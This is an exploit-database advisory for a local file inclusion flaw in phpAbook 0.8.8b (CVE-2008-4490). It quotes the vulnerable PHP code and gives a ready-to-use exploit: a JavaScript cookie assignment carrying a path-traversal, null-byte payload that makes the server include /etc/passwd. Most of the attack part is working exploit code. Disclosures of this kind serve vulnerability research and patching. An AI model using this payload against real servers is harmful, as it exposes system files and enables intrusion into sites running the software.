Lucene search
JosSEDB-ID:6679HistoryOct 05, 2008 - 12:00 a.m.
phpAbook 0.8.8b - 'cookie' Local File Inclusion
2008-10-0500:00:00
JosS
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability
# url: http://sourceforge.net/projects/phpabook/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off
vuln file: include/config.inc.php
vuln code:
x: >...
61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") {
$userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]);
$userName = $userArray[0];
$userID = $userArray[1];
$userLang = $userArray[2];
include("include/lang/$userLang/inc.messages.php");
67: }
x: <...
Proof of Concept (function 'explode' PHP):
[0] = JosS;
[1] = JosS;
[2] = ../../../../etc/passwd%00; ---> INCLUDE
exploit:
javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/";
Ingenious work :D
# milw0rm.com [2008-10-05]Related
cvelist
cvelist
CVE-2008-4490
2008-10-08 01:00:00
nvd
nvd
CVE-2008-4490
2008-10-08 02:00:01
cve
cve
CVE-2008-4490
2008-10-08 02:00:01
prion
prion
Directory traversal
2008-10-08 02:00:00